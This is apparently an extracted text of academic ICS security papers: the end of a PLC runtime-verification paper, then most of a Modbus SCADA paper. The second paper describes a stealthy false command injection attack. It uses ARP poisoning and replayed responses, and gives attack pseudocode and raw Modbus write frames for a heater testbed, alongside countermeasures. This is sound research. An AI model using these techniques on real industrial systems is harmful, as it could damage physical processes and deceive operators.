models themselves. We rst review works related to the guidelines associated with securing control systems. In [10], NIST guideline security architectures are presented for ICS with respect to supervisory control and data acquisition systems, distributed control sys- tems, and PLCs. Similar guidelines for the energy industry are presented in [11] and [12]. [13] and [14] argue that compliance with these standards provide a false sense of security. We now discuss previous security and veri cation solutions presented for control systems. TSV [4] presented an external bump-in-the-wire veri er for process controller code down- loaded to the PLC. Mohan et al. [15] introduced a monitor that dynamically checks the safety of plant behavior. Of ine intrusion detection solutions have been proposed to model PLC traf c as a deterministic nite automaton in [8] and [6]. Another model based intrusion detection was proposed in [16]. In all cases, the security solutions were implemented as external solutions as opposed to within the PLC. Avatar [17] provides a framework to support dynamic security analysis of embedded systems rmware. However, the rmware resides below the control logic level and security/veri cation solutions cannot be easily integrated into the scan-cycle of the PLC. In general, our solution focuses more on application-level security solutions. [18] uses mathematical analysis techniques to evaluate various aspects, such as safety and reliability, of a given control system, but focuses on accidental failures and not malicious actions. PLC vendors themselves typically use basic security mechanisms with a single privilege level [4]. VII. C ONCLUSIONS In this paper we presented two security models for PLCs that leverage the advanced computational power of embedded hypervisors that are coupled with PLCs. We evaluated im- plementations of both models on a real PLC on a simulated cyber-physical system with unpredictable operation. ACKNOWLEDGEMENT The authors would like to express their gratitude to George Trummer, Stefan Woronka, Ben Collar and Frank Garrabrant for their insightful feedbacks and constructive suggestions. This material is based upon work supported by Siemens as well as the Department of Energy under Award Number DE- OE0000780. REFERENCES [1] US ICS-CERT. (2015) ICS CERT Monitor, November/December 2015. https://ics-cert.us-cert.gov/monitors/ICS-MM201512. [2] D. Nardella. (2015) Snap7 Overview. http://snap7.sourceforge.net/. [3] J. Klick, S. Lau, D. Marzin, J.-O. Malchow, and V . Roth, Internet-facing plcs-a new back ori ce. [4] S. E. McLaughlin, S. A. Zonouz, D. J. Pohly, and P. D. McDaniel, A trusted safety veri er for process controller code. in Proceedings of the Network and Distributed System Security (NDSS) Symposium , 2014.[5] S. Zonouz, J. Rrushi, and S. McLaughlin, Detecting industrial control malware using automated plc code analytics, Security & Privacy, IEEE , vol. 12, no. 6, pp. 40 47, 2014. [6] A. Kleinman and A. Wool, Accurate modeling of the siemens s7 scada protocol for intrusion detection and digital forensics, The Journal of Digital Forensics, Security and Law: JDFSL , vol. 9, no. 2, p. 37, 2014. [7] Siemens. (2009) SIMATIC Windows Automation Center RTX Open Development Kit (WinAC ODK). https://cache.industry.siemens.com/dl/ les/966/35948966/att 82094/v1/winac odk user manual en-US en-US.pdf. [8] N. Goldenberg and A. Wool, Accurate modeling of modbus/tcp for intrusion detection in scada systems, International Journal of Critical Infrastructure Protection , vol. 6, no. 2, pp. 63 75, 2013. [9] Wireshark. (2016) tshark. https://www.wireshark.org/docs/man-pages/ tshark.html. [10] National Energy Regulatory Commission, NERC CIP 002 1 - Critical Cyber Asset Identi cation, 2006. [11] K. Stouffer, J. Falco, and K. Scarfone, Guide to industrial control systems (ics) security, NIST special publication , vol. 800, no. 82, pp. 16 16, 2011. [12] R. Carlson, J. Dagle, S. Shamsuddin, and R. Evans, A summary of control system security standards activities in the energy sector, Department of Energy , p. 48, 2005. [13] J. Weiss, Are the nerc cips making the grid less reliable, Control Global , 2009. [14] L. Pietre-Cambac edes, M. Tritschler, and G. N. Ericsson, Cybersecurity myths on power control systems: 21 misconceptions and false beliefs, Power Delivery, IEEE Transactions on , vol. 26, no. 1, pp. 161 172, 2011. [15] S. Mohan, S. Bak, E. Betti, H. Yun, L. Sha, and M. Caccamo, S3a: secure system simplex architecture for enhanced security of cyber- physical systems, arXiv preprint arXiv:1202.5722 , 2012. [16] S. Cheung, B. Dutertre, M. Fong, U. Lindqvist, K. Skinner, and A. Valdes, Using model-based intrusion detection for scada networks, inProceedings of the SCADA security scienti c symposium , vol. 46. Citeseer, 2007, pp. 1 12. [17] J. Zaddach, L. Bruno, A. Francillon, and D. Balzarotti, Avatar: A framework to support dynamic security analysis of embedded systems rmwares. in NDSS , 2014. [18] W. M. Goble, Control systems safety evaluation and reliability . ISA, 2010.72 Powered by TCPDF (www.tcpdf.org)Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:42 UTC from IEEE Xplore. Restrictions apply.
Detecting PLC Control Corruption via On-Device Runtime Veri cation Luis Garcia, Saman Zonouz Department of Electrical & Computer Engineering Rutgers University Piscataway, New Jersey 08854 fl.garcia2, saman.zonouz [email protected] Wei, Leandro P eger de Aguiar Siemens Corporation, Corporate Technology Princeton, New Jersey, 08540 fdong.w, leandro.p eger [email protected]
A_Stealthy_False_Command_Injection_Attack_on_Modbus_based_SCADA_Systems.pdf
Modbus is a widely-used industrial protocol in Supervisory Control and Data Acquisition (SCADA) systems for different purposes such as controlling remote devices, monitoring physical processes, data acquisition, etc. Unfortunately, such a protocol lacks security means i.e., authentication, integrity, and con dentiality. This has exposed industrial plants using the Modbus protocol and made them attractive to malicious adversaries who could perform various kinds of cyber-attacks causing signi cant consequences as Stuxnet showed. In this paper, we exploit the insecurity of the Modbus protocol and perform a stealthy false command injection scenario concealing our injection from the SCADA operator. Our attack approach is comprised of two main phases: 1) Pre-attack phase (of ine) where an attacker sniffs, collects and stores suf cient valid request- response pairs in a database, 2) Attack phase (online) where the attacker performs false command injection and conceals his injection by replaying a valid response from his database upon each request sent from the HMI user. Such a scenario is quite severe and might cause disastrous damages in SCADA systems and critical infrastructures if it is successfully implemented by malicious adversaries. Finally, we suggest some appropriate mitigation solutions to prevent such a serious threat.
A Stealthy False Command Injection Attack on Modbus based SCADA Systems Wael Alsabbagh1,2, Samuel Amogbonjaye2, Diego Urrego2and Peter Langend rfer1,2 1IHP Leibniz-Institut f r innovative Mikroelektronik, Frankfurt (Oder), Germany 2Brandenburg University of Technology Cottbus-Senftenberg, Cottbus, Germany {Alsabbagh, Langendoerfer}@ihp-microelectronics.com {urregdie, amogbolu}@b-tu.de Index Terms SCADA; PLCs; ICSs; Modbus Protocol; Cyber-attacks; Command Injection Attacks; I. I NTRODUCTION Supervisory Control and Data Acquisition (SCADA) sys- tems are employed by millions of industries and plants to mon- itor and control critical physical processes such as oil and gas facilities, water treatment systems, nuclear plants, electrical power grids, etc. SCADA systems provide users with a fully automated control, as well as a remote access and service mon- itor. Typical SCADA systems consist of different industrial components e.g., Engineering Work Stations (EWSs), Human Machine Interfaces (HMIs), Programmable Logic Controllers (PLCs), Input/Output (I/O) modules, sensors, valves, motors, and others [1]. Due to the necessity of having a remote management in the critical infrastructures, SCADA systems are increasingly connected to Ethernet and Transmission Con- trol Protocol/Internet Protocol (TCP/IP) based networks e.g., Internet, as well as Virtual Private Network (VPN)-based remote access to reduce maintenance costs [2]. Unfortunately, this connectivity brings its own risks and exposes millions of systems to cyber-attacks from the outer world that were not existing in the air-gapped era [3].The security of SCADA systems has been recently a major focus of the cyber-security researchers and industrial engineers due to the critical role they play in any automation company. It is not a secret that many old SCADA components with no security measures are still operating in many critical plants for two major reasons. First, industrial devices have a long life-cycle (twenty years or longer) which results in not being security patched (up-to-date) for a while. Secondly, there may be legacy devices that are not compatible with newer security-improved protocols. Wherefore, we should expect that many insecure SCADA devices are placed in remote locations and linked to the outer world via Internet. Thus, if a skilled adversary gains access to a SCADA network, he can perform malicious attacks to disrupt the physical process that the target system controls, which eventually might cause serious damages as Stuxnet [4], BlackEnergy [5], Shamoon [6], Kemuri [7] and German Steel Mill [8] showed. Along with the system-level security concerns, SCADA pro- tocols such as Modbus, Distributed Network Protocol (DNP3), High Level Data Link Control (HDLC), International Electro Technical Commission (IEC) 60870, etc. are substantially vulnerable and lack fundamental security mechanisms [9]. All these protocols provide client/server communications between different SCADA devices connected on different buses or networks. The Modbus protocol [10] is believed to be the most common industrial protocol implemented by hundreds of ven- dors on thousands of device models to transfer digital/analog inputs/outputs and register data between the connected devices e.g., HMIs and PLCs. Despite that Modbus provides the indus- trial community with simplicity, applicability, and ef ciency, it contains multiple vulnerabilities that have allowed attackers to exploit the insecurity of the protocol and conduct different attacks e.g., reconnaissance activity, command injection, data injection, access injection, etc. Hijacking the interconnection between PLC and HMI devices represents the most often used attack scenario targeting SCADA systems using the Modbus such the one occurred against Maroochy water breach [11]. In this work, we introduce a stealthy False Command Injection (FCI) attack approach based on integrating a database containing real Modbus request-response pairs between PLC and HMI devices. The database is created prior to the launch of our attack i.e., of ine. In our approach, an attacker placed inCCNC 2023 WKSHPS: 5th International workshop on security trust privacy for cyber-physical systems (STP-CPS 23) 978-1-6654-9734-3/23/$31.00 2023 IEEE2023 IEEE 20th Consumer Communications & Networking Conference (CCNC) | 978-1-6654-9734-3/23/$31.00 2023 IEEE | DOI: 10.1109/CCNC51644.2023.10059804 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:39:00 UTC from IEEE Xplore. Restrictions apply. a man-in-the-middle (MITM) position interrupts the Modbus requests sent from the HMI dropping them from the network so they do not reach the PLC, compares them to the ones existing in his database, and then replies to the HMI with the expected responses. Meanwhile, he can inject the PLC with false commands i.e., sending malicious requests that alter inputs or outputs causing a dangerous behavior on his will. In other words, our approach effectively decouples the PLC from the HMI i.e., it generates two independent communication ows: one between the PLC and the attacker, and the other between the attacker and the HMI. This scenario is quite severe as the SCADA operator is tricked in a way that he is always shown fake views while the PLC is processing malicious commands sent by the attacker. For a practical implementation, we conducted our approach on a virtual SCADA system based on OpenPLC1and ScadaBR2software. This is due to logistic constraints and the dif culty of using real-world SCADA systems for research purposes. Finally we suggested some security countermeasures and mitigation solutions to prevent such a serious threat. The rest of the paper is structured as follows. Section II discusses related works, while Section III provides a security overview of Modbus protocol. In section IV , we illustrate our attack approach, and show the implementation as well as the resulting evaluation in section V . Finally, we suggest some security countermeasures and appropriate mitigation solutions in Section VI, and conclude this paper in section VII. II. R ELATED WORK Modbus protocol is very simple, ef cient and public free on one hand, But on the other hand it has many vulnerabilities that allows an adversary to perform reconnaissance activity or use arbitrary commands. Possible vulnerabilities in the Modbus speci cation and major implementations of the protocol were investigated by Hitsi [12]. Such weaknesses can be exploited to perform spoo ng, replay, and ooding attacks. Morris et al. [13] illustrated theoretical data injection and Denial of Service (DoS) attacks against industrial equipment that relies on Modbus. Such attacks stem from the protocol s insuf cient security measures for data integrity and availability. Morris, in a follow-up work [14], described and tested reconnaissance, response injection, command injection, and DoS attacks, and also elaborated on several standalone and stateful Intrusion Detection System (IDS) rules in an attempt to deter such incidents. Nardone et al. [15] formally analyzed and assessed the Modbus protocol in terms of the security features each variant provides. The work by Tsalis et al. [16] demonstrated that even in the presence of encryption, side-channel attacks might reveal information on Modbus protocol messages. Using a testbed comprising of virtual machines running on Linux, Parian et al. [17] detailed on two attacks, namely manipulation of packets via malware-infected hosts and classic MITM attacks i.e., Address Resolution Protocol (ARP) poisoning. 1https://openplcproject.com/ 2http://www.scadabr.com.br/Rosa et al. [2] showed the implementation of a set of attacks targeting a Hybrid Environment for Design and Validation (HEDVa). For a practical attack scenario, the authors built and con gured a small testbed controlled by Modbus PLCs. As a part of their work, they conducted network reconnais- sance, MITM attack, and nally injected PLCs with dangerous Read/Write (R/W) coils requests. All the aforementioned works focused on confusing the physical processes controlled by exposed PLCs using the vulnerabilities of the Modbus protocol. But, the SCADA operator could detect and disclose these attacks easily as they can observe abnormal changes displayed on the HMIs. In our paper, we overcome this challenge and conceal our attack by sending the HMI fake views similar to the ones it expects to receive as illustrated in Section IV . III. M ODBUS PROTOCOL AND VULNERABILITIES Modbus is an application layer messaging protocol located at the seventh level of the OSI3model. It provides a mas- ter/slave communication between devices connected on dif- ferent buses and networks. Figure 1 depicts a typical SCADA communication where a data acquisition server or an HMI will run as a Modbus client component (master) and a PLC will run as its pair device, that is, a server component (slave). Fig. 1: Example of interaction between Modbus master and slave devices The master device (HMI) sends a Modbus request to the connected slave device (PLC) to poll the data. The PLC replies upon the request with a Modbus response to the HMI. If the request is not correct, then the HMI sends exception response to the PLC. Figure 2 shows the architecture of a Modbus frame encapsulated over TCP/IP protocol. The Function code eld determines the action required from the the PLC to do. Table I gives the details of some function codes and their corresponding actions. These function codes are the most frequently used in an interaction between PLCs and HMIs in SCADA systems. The Modbus protocol itself lacks various security features which exposes it to cyber-attacks hijacking the Modbus com- munication between the connected devices and manipulating the frames to inject false commands/data into the PLC. How- ever, in the following we list the most reported vulnerabilities in Modbus protocol as described in [19] [21]: 3https://www.fortinet.com/resources/cyberglossary/osi-modelCCNC 2023 WKSHPS: 5th International workshop on security trust privacy for cyber-physical systems (STP-CPS 23) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:39:00 UTC from IEEE Xplore. Restrictions apply. Fig. 2: Modbus TCP/IP frame format, adopted from [18] Table I: Function codes and their corresponding actions Function Code Modbus Function 0x01 Read Coil Status 0x02 Read Discrete Input 0x03 Read Holding Registers 0x04 Read Input Registers 0x05 Write Single Coil 0x06 Write Single Holding Register 0x15 Write Multiple Coils 0x16 Write Multiple Holding Registers 0x17 Report Slave ID - Integrity of Modbus frame is not veri ed by peer devices [22], [23]. The frame can be altered by an attacker and peer devices cannot reveal this manipulation. - There is no facility for maintaining con dentiality of messages. The Modbus frames are transferred in plain text and any attacker placed in MITM position can sniff the packet and access the frame information. - It does not support time-stamp for the frames. This is one of the critical problems because peer devices cannot know whether the received response is obtained for the recent or old request. Therefore, any manipulation may happen due to mismatch of real-time eld values. - Modbus is an open protocol and it had a simple frame format. Thus, A network analyzer tool usch as Wireshark4 can be used by an attacker to retrieve the information from the network. As a result of lacking the aforementioned security measures, Modbus is highly vulnerable to various cyber-attacks such as MITM attacks in the form of False Command Injection (FCI), False Access Injection (FAI), False Response Injection (FRI), Replay attacks and DoS attacks [24] [27]. IV. A TTACK DESCRIPTION Figure 3 shows a high-level overview of the attack scenario we perform to inject the PLC with false commands without being noticed by the HMI device. To this end, we need rst to discover the network topology of the target system, then collect Modbus TCP/IP packets from the network traf c 4https://www.wireshark.org/to create our database that eventually contains real request- response interaction pairs. However, these two steps are done prior to our injection attack. After collecting the needed pairs, we start our main attack by poisoning the ARP cache of the connected devices i.e., the HMI and PLC, and then inject the target PLC with false commands whilst we send the expected response packet upon each request to the HMI. This conceals our attack and the SCADA operator will be always shown fake views that he is expecting to see. In the following, we elaborate each attack step in detail. A. Pre-Attack Phase (Of ine) Here, the attacker aims to get an overview of the network topology, open ports, connected devices, and communication protocols used in the target system. Then, he sniffs and collects real interactions between the HMI and PLC i.e., request- response pairs that both stations exchange over the Modbus TCP/IP frames. 1) Network Reconnaissance: Discovering the network is the rst step that an attacker needs to do, meant to collect information/data about all the components of the SCADA environment, to identify the network topology, hosts and services. For instance, industrial devices such as PLCs and HMIs are identi ed by IP and Media Access Control (MAC) addresses, operating system versions and a set of services. Thus, to obtain these addresses and information we used the NMAP5Port scanner that identi es the Modbus protocol on the network. Figure 4 shows the scanning process where synchronize (SYN) packets are sent from the attacker machine over the network. Fig. 4: Network Reconnaissance Attack Using this technique, SYN packets can scan thousands of ports per second due to the fact that the TCP connection is not fully established (half-open communication). Therefore, it is dif cult to detect by default network rules. 2) Snif ng and Collecting Data: NMAP tool provides the attacker only a perspective on the target system from the network point-of-view. Meaning that, it does not provide process-level information, which is required to implement so- phisticated attacks. Thus, in the next step the attacker listens to 5https://nmap.org/CCNC 2023 WKSHPS: 5th International workshop on security trust privacy for cyber-physical systems (STP-CPS 23) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:39:00 UTC from IEEE Xplore. Restrictions apply. Fig. 3: High-level Overview of our Attack Approach the network traf c and captures each Modbus TCP/IP request frame sent from the HMI alongside with its corresponding Modbus response(s) from the PLC. To this end, we rst run a network analyzer software e.g., Wiershark. Our investigations showed that each request and its corresponding response(s) share the same Transaction Identi er (TID), Unit ID (which indicates how many frames the response from the PLC is comprised of), and Function Code. For this, encapsulated Modbus protocol messages can be extracted and grouped into request-response pairs based on those three parameters. Figure 5 shows an example of a Modbus interaction between PLC and HMI devices where the response from the PLC consists of two frames, and all the frames (request and response) have the same values: 0x19bd inTID, 0x02 inUnit ID, and 0x03 inFunction Code. Fig. 5: Example of a Modbus request-response interaction between PLC and HMI Based on those parameters, an attacker can easily extract and pair the Modbus packets as request-response frames.Moreover, he can analyze the packets deeper and gather more detailed information about each Modbus register effected the others. To quicken the comparison process during our injection, all the duplicate pairs are eliminated as depicted in gure 6. Please note that duplicated messages can exist if there is a periodical status check between the PLC and HMI. Finally, to collect a suf cient number of request-response pairs, the snif ng process should last for a reasonably long period of time e.g., in this work, we sniff the network for approx. 30 minutes. For our virtual SCADA system presented in gure 9, we managed successfully to create a database containing 18 request-response pairs. It is worth mentioning that pairing the captured Modbus frames in our database into request-response frames, helps the attacker to win the strict race condition that the HMI and PLC must meet before he replies his forged Modbus response frame to the HMI. B. Attack Phase (Online) At the end of the previous stage, an attacker has the Modbus request-response frames that are frequently exchanged between the HMI and PLC. So, he can start his major attack by rst placing himself between the HMI and PLC (MITM position). This step is done by using the well-known ARP Poisoning approach. Then all messages will go through the attacker s machine who drops the received request frame from the network, compares it to the ones existing in the database and nally responses to the HMI with the expected correct response accordingly. In the mean time, the attacker sends the PLC a malicious request frame e.g., R/W coils request, and drops also the original response sent from the PLC to the HMI. In the following, we illustrate this phase in detail. 1) ARP Poisoning (MITM) Approach: The concept of an ARP poisoning attack comprises of two parts: an ARP spoof- ing and a communication hijacking. In the rst stage, an attacker manipulates the ARP cache of both PLC and HMI devices by broadcasting malicious and forged "is-at" ARP messages over the network as depicted in gure 7. This technique forces both devices to send the packets through theCCNC 2023 WKSHPS: 5th International workshop on security trust privacy for cyber-physical systems (STP-CPS 23) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:39:00 UTC from IEEE Xplore. Restrictions apply. Fig. 6: Scheme of creating our database attacker MAC address, and requires from the attacker to only know both IP and MAC addresses of the victims (e.g., HMI and PLC) which are already obtained in the early steps of the pre-attack phase. Fig. 7: ARP Poisoning Attack As soon as the ARP cache of each victim is spoofed, the traf c gets redirected through the attacker s machine. At this point, the attacker is capable of reading all the Modbus messages transmitted between the HMI and PLC, and then for- warding them to the nal destination respectively (interception attack), or actively change them before pushing them back to the network (modi cation attack). Please note that the HMI may generate a realistic state update, while decoupling HMI- PLC interactions. For this purpose, the adversary should reply to each Modbus request in real-time. Moreover, TCP session hijacking requires from the attacker to maintain the integrity of the TCP connection e.g., appropriate TCP sequence numbers to prevent losing the connection. 2) Stealthy Command Injection Attack: Figure 8 presents the full-chain of our injection scenario. When a Modbusrequest frame is sent from the HMI to the PLC, the attacker intercepts this frame, drops it from the network, compares the frame to the request frames in his database, and nally com- putes the corresponding response(s) accordingly. Meanwhile, he sends a forged Modbus request frame (e.g., R/W coils request) to the PLC impersonating the HMI. This approach is quite severe as the SCADA operator is tricked in a way that he is always shown fake views while the PLC is processing malicious commands sent by the attacker. Fig. 8: Stealthy Command Injection Attack Scenario This approach has a challenge. If an attacker stops his ARP poisoning attack i.e., he stops sending fake response messages to the HMI, and the HMI requires the PLC registers values upon a Modbus request frame, the PLC responses reporting the current PLC status i.e., the modi ed inputs and outputs. Therefore, the SCADA operator can reveal that the system isCCNC 2023 WKSHPS: 5th International workshop on security trust privacy for cyber-physical systems (STP-CPS 23) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:39:00 UTC from IEEE Xplore. Restrictions apply. Fig. 9: Virtual SCADA system based on OpenPLC and ScadaBR software operating abnormally. To overcome this challenge and make our attack even severer than it is, the attacker should re-initiate all the registers to the values stored prior to his attack. To this end, he needs to read all the register values before the attack, and writes these values again to the PLC before he closes the TCP communication with the devices. This restores the previously system state after stopping the attack and the PLC will report to the HMI the last view prior to the injection. V. I MPLEMENTATION AND EVALUATION A. Experimental Settings 1)Lab Setup: We evaluate our attack approach on a virtual SCADA system based on OpenPLC and ScadaBR software as shown in gure 9. The given virtual system represents a water tank heater experiment. It aims at keeping the temperature of a water tank at a certain value e.g. 40 C. Meaning that, if the temperature goes lower than 40 C, the corresponding sensor (Input) reports to the PLC, and the PLC responds by sending a control command to the heater (Output) to switch it ON. The heater remains ON until the temperature is again as high as the con gured set-point. This process works in two con guration modes: Auto and Manual. The interaction between both OpenPLC and ScadaBR is handled using Modbus protocol over TCP/IP where ScadaBR is the master device and OpenPLC is the slave device. The control logic program is developed using the OpenPLC Editor in one of the ve high-level programming languages de ned in IEC- 61131 [28]. The PLC Program is then compiled to an ST le before being uploaded to the OpenPLC. 2)Attacker Model: We assume that an attacker has access to the level-3 network of the Purdue Model6. This assumption is based on real world SCADA attacks e.g., TRITON [29] and BalckEnergy attack [5] that got access to the control center via a typical IT attack vector such as infected USB stick and social engineering attack. After the level-3 network 6https://www.goingstealthy.com/the-ics-prude-model/access, an attacker can make use of software and libraries to communicate with the target PLC over the network. Since these assumptions have been reported to hold true in reports on real world attacks, we are convinced that our attack is a realistic one. B. Attack Implementation After placing the attacker in MITM position between the ScadaBR and OpenPLC, he rst reads all the current values that are stored in the PLC s memory registers e.g., coils, inputs, etc. Figure 10,11,12,13,14 and 15 show all the request- response frames exchanged between the attacker and the OpenPLC to obtain these values. To inject the PLC with different false commands, we developed a simple python script that sends crafted Modbus request frames to the target IP address on the open port 502. Table II shows the format of the frames we used to attack the given virtual system in gure 9. For instance, if an attacker aims at turning the heater OFF in the Auto mode, the following frame should be sent to the PLC: 0x010600040000. Our results showed that we could successfully modify different inputs, outputs and data stored in the PLC registers as shown in gure 16. Fig. 10: Request frame sent from the attacker to the OpenPLC - Read all PLC coils To conceal our injection from the SCADA operator, we developed an attacking tool that sniffs all the Modbus re- quest frames from the network, compares them to the ones in our database, and nally responses with the appropriate response(s) to the HMI. Algorithm 1 depicts the main core ofCCNC 2023 WKSHPS: 5th International workshop on security trust privacy for cyber-physical systems (STP-CPS 23) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:39:00 UTC from IEEE Xplore. Restrictions apply. Fig. 11: Response frame from the OpenPLC - Only two coils have values: Bit 0 and 63 Fig. 12: Request frame from the attacker to the OpenPLC - Read all discrete registers Fig. 13: Response frame from the OpenPLC - All the bits have the value of null Fig. 14: Request frame from the attacker to the OpenPLC - Read all PLC holding registers Fig. 15: Response frame from the OpenPLC - Only three registers have values in the PLC memory: Reg. 1,2 and 3 Fig. 16: The HMI monitor before and after the attack the python script we used to design our attacking tool. After launching our tool, if the ScadaBR sends a Modbus request (e.g., write single register) to the OpenPLC, our MITM system intercepts this frame, compares it with the ones existing in our database, precisely with the request frames and nally replies to the ScadaBR by sending the corresponding response frame(s) based on the Transaction ID, Unit ID, and Function Code. It is worth mentioning that the attacker still needs to drop the original request from the network to avoid updating the PLC s registers. However, this is an easy task as the attacker only needs to not complete the full-cycle of the MITM attack i.e., he does not forward the frame to the nal destination (PLC). Algorithm 1 FCI Attack based on the Database Approach Function inject (iface=eno, src_port) 1:packet = sniff (iface = eno, timeout = cfg_sniff_time) 2:save_pcap (sniff.pcap) 3:forpcap in rdpcap (save_pcap) do 4: src_id = pcap [1:6], dest_id = pcap [7:12], mbus_pkt = lter_mbus(pcap) 5: forpkt in mbus_pkt() do 6: trans_id = pkt [1:2], Protocol_id = pkt[3:4], Length = pkt[5:6], Unit_id = pkt[7], function = pkt[8:9], start_address = pkt[10:11], data = pkt[12: ] 7: if(src_ip = ScadaBR_src_ip & dest_ip = plc_ip) then 8: forp in rdpcap (response_pcap) do 9: iftrans_id == p[1:2] & unit_id == p[7] & function == p[8:9] then 10: fgd_pkt = p[1:]) break 11: end if 12: P = P+1 13: end for 14: end if 15: pkt = pkt + 1 16: end for 17: pcap = pcap + 1 18:end for 19:while time_slot() do 20: sendp(iface, fgd_pkt , src_ip, port) 21:end while END FunctionCCNC 2023 WKSHPS: 5th International workshop on security trust privacy for cyber-physical systems (STP-CPS 23) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:39:00 UTC from IEEE Xplore. Restrictions apply. Table II: Modbus frames and their corresponding actions Action Modbus frame Turning the Heater ON (Manual Mode) 0x01 0x06 0x00 0x05 0x00 0x01 Turning the Heater OFF (Manual Mode) 0x01 0x06 0x00 0x05 0x00 0x00 Turning the Heater ON (Auto Mode) 0x01 0x06 0x00 0x04 0x00 0x01 Turning the Heater OFF (Auto Mode) 0x01 0x06 0x00 0x04 0x00 0x00 Setting a new temperature 0x01 0x06 0x00 0x01 0x2f 0xff Setting a new set-point 0x01 0x06 0x00 0x02 0x2f 0xff VI. S ECURITY COUNTERMEASURES Our experiments presented in this paper showed that there is no security in the Modbus protocol. Therefore, if attackers could access a Modbus device on a network they would be able to read/write whatever and whenever they want. Based on this fact, many industrial engineers implemented rewalls between the internet server and the control network to protect their systems i.e., all the Modbus devices are placed behind the rewalls see gure 17. Fig. 17: SCADA system architecture using rewallsThis method splits Modbus devices from the internet but if any server behind the rewall is authorized to access the modbus devices through the rewall there is a vulnerability. Therefore, implementing rewalls alone without any additional security measures failed partly to prevent cyber-attacks. The advanced rewall presented in [30] would be a more reason- able protection method. The authors designed an industrial- speci c rewall based on the Modbus protocol. Their rewall combines security policies with Deep Packet Inspection (DPI). An alternative solution would be using the modi ed version of the modbus protocol introduced in [31]. This new protocol version implements anti-replay techniques and authentication mechanisms that validate each packet received at modbus devices. Another appropriate solution would be the one in- troduced in [32] which deploys security functions in the messaging stack prior to the transmission. The authors used AES [33], RSA [34], or SHA-2 [35] algorithms to encrypt the Modbus packet while a secret key is exchanged between the master and the salve using a separate secure channel. All the aforementioned security methods are reasonable solutions to secure Modbus based SCADA systems against our injection attack or similar scenarios if they are implemented. VII. CONCLUSION AND FUTURE WORK This paper presented a false command injection (FCI) attack scenario against Modbus based SCADA systems, where an external adversary exploited insecurities of the Modbus pro- tocol and injected the target PLC with malicious commands. To make our attack more challenging, we involved a database containing real request-response interaction pairs which helps the adversary to always reply to the HMI with the expected responses. This could conceal our attack from the operator, and decouples the PLC from the HMI i.e., the operator will not notice any abnormal behavior on the control site. Our attack scenario is quite severe in case it is conducted against real- world SCADA systems, and the consequences could be even disastrous if the targets are critical infrastructures or nuclear plants. To secure Modbus based SCADA systems, plants, and industrial environments we suggested some security coun- termeasures that assist in mitigating/detecting our attack or similar scenarios if they are applied. In respect of securing SCADA systems, the Modbus orga- nization released a newer Modbus protocol variant namely, Modbus Transport Layer Security (TLS7) running on the port 7https://modbus.org/docs/MB-TCP-Security-v21_2018-07-24.pdfCCNC 2023 WKSHPS: 5th International workshop on security trust privacy for cyber-physical systems (STP-CPS 23) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:39:00 UTC from IEEE Xplore. Restrictions apply. 802. This advanced protocol adds security speci cations that the traditional Modbus protocol lacks (e.g., authentication and messages-integrity mechanisms) to prevent cyber-attacks such as DoS, MITM, replay attacks, etc. The Modbus TLS is still not well analyzed by the researchers from the security point-of-view. Thus, we aim in the future to investigate this developed protocol against our attack approach as the Modbus organization claimed that it is more resilient against cyber- attacks and even secure by an additional security layer between the server and client devices. Therefore, investigating the security of such a protocol will be more challenging and complex. REFERENCES [1] A. S. Arag , E. R. Mart nez and S. S. Clares, "SCADA Laboratory and Test-bed as a Service for Critical Infrastructure Protection," In Proceedings of the 2nd International Symposium on ICS & SCADA Cyber Security Research, St P lten, Austria, 11 12 September 2014. DOI: 10.14236/EWIC/ICS-CSR2014.4. [2] L. Rosa, T. Cruz, P. Sim es, E. Monteiro and L. Lev, "Attacking SCADA systems: A practical perspective," 2017 IFIP/IEEE Symposium on Integrated Network and Service Management (IM), 2017, pp. 741- 746, doi: 10.23919/INM.2017.7987369. [3] W. Alsabbagh and P. Langend erfer, "A New Injection Threat on S7- 1500 PLCs - Disrupting the Physical Process Of ine," in IEEE Open Journal of the Industrial Electronics Society, vol. 3, pp. 146-162, 2022, doi: 10.1109/OJIES.2022.3151528. [4] N. Falliere, Exploring Stuxnet s PLC infection process, in Virus Bul letin Covering Global Threat Landscape Conf., Sep. 2010. [5] R. M. Lee, M. J. Assante, and T. Conway, "Analysis of the cyber-attack on the Ukrainian power grid," Technical report, SANS E-ISAC, March 18 2016. Available at: https://ics.sans.org/media/ESAC_SANS_Ukraine_DUC_5. pdf. [6] Z. Dehlawi and N. Abokhodair, "Saudi Arabia s response to cyber con ict: A case study of the Shamoon malware incident," 2013 IEEE International Conference on Intelligence and Security Informatics, 2013, pp. 73-75, doi: 10.1109/ISI.2013.6578789. [7] Verizon. (2016) Data breach digest. scenarios from the eld. [Online]. Available at: https://www.ndia.org/-/media/sites/ndia/meetings-and- events/divisions/cfam/past-events/2016-august/cfam-forum-slides verizon-data-breach-digest.ashx?mod=article_inline. [8] R. M. Lee, M. J. Assante, and T. Conway, German steel mill cyber attack, Industrial Control Systems, vol. 30, p. 62, 2014. [9] M. A. Teixeira, T. Salman, M. Zolanvari, R. Jain, N. Meskin, Nader and M. Samaka, "SCADA System Testbed for Cybersecurity Research Using Machine Learning Approach," In Future Internet journal, vol. 10, 2018. DOI: 10.3390/ 10080076. [10] Modicon Inc., Modicon Modbus Protocol Reference Guide - PI-MBUS- 300 Rev. June 1996. [11] J. Slay, and M. Miller, Lessons learned from the maroochywa- ter breach, Critical Infrastructure Protection, volume253/2007, pages 73 82. Springer Boston, November 2007. [12] P. Huitsing, R. Chandia, M. Papa, and S. Shenoi, Attack taxonomies for the modbus protocols, International Journal of Critical Infrastructure Protection, vol. 1, pp. 37 44, 2008. [13] T. H. Morris, B. A. Jones, R. B. Vaughn, and Y . S. Dandass, Deter- ministic intrusion detection rules for modbus protocols, in 2013 46th Hawaii International Conference on System Sciences. IEEE, 2013, pp. 1773 1781. [14] W. Gao and T. H. Morris, On cyber attacks and signature based intrusion detection for modbus based industrial control systems, Journal of Digital Forensics, 